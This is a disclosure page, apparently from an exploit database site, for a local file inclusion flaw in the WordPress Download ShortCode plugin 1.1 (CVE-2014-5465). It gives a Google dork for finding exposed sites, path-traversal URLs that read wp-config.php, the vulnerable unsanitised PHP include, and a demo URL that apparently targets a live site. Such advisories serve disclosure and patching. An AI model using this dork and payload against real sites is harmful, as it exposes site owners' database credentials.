Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
WordPress ShortCode 1.1 Local File Inclusion
2014.08.28
Credit:
Mehdi & Chris
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2014-5465
CWE:
CWE-98
CVSS Base Score:
5/10
Impact Subscore:
2.9/10
Exploitability Subscore:
10/10
Exploit range:
Remote
Attack complexity:
Low
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
None
Availability impact:
None
################################################################################################# # # Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability # Severity : High+/Critical # Reporter(s) : Mehdi Karout & Christian Galeone # Google Dork : inurl:wp/wp-content/force-download.php # Plugin Version : 1.1 # Plugin Name : Download ShortCode # Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip # Vendor Home : http://werdswords.com/ # Date : 25/08/2014 # Tested in : Win7 - Kali Linux # CVE : CVE-2014-5465 # ################################################################################################## # # PoC : # # # http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File] # # http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php # # Exploit Code : # # $file = $_GET['file']; # if(isset($file)) # { # include("pages/$file"); # } # else # { # include("index.php"); # } # # Demo : # # http://llyndXmoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php # ##################################################################################################
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top